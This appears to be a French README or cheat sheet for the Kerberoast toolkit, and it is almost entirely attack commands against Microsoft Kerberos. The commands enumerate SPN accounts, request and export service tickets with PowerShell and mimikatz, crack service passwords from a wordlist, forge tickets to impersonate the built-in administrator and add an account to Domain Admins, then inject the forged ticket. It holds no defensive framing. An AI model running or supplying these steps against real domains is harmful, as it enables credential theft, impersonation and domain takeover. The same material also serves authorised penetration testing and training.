
Boîte à outils pour attaquer les implémentations MS Kerberos: extraire les comptes SPN, demander et exporter des tickets, cracker les mots de passe de service, réécrire les tickets pour l'usurpation d'identité et l'élévation de privilèges.
Kerberoast est une série d'outils pour attaquer les implémentations Kerberos de Microsoft. Vous trouverez ci-dessous un bref aperçu de ce que chaque outil fait.
PS C:\> setspn -T medin -Q */*
Un ticket :
PS C:\> Add-Type -AssemblyName System.IdentityModel
PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local"
Tous les tickets
PS C:\> Add-Type -AssemblyName System.IdentityModel
PS C:\> setspn.exe -T medin.local -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }
mimikatz # kerberos::list /export
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
Faire apparaître l'utilisateur comme un utilisateur différent
./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -u 500
Ajouter un utilisateur à un autre groupe (ici, Administrateur du domaine)
./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -g 512
kerberos::ptt sql.kirbi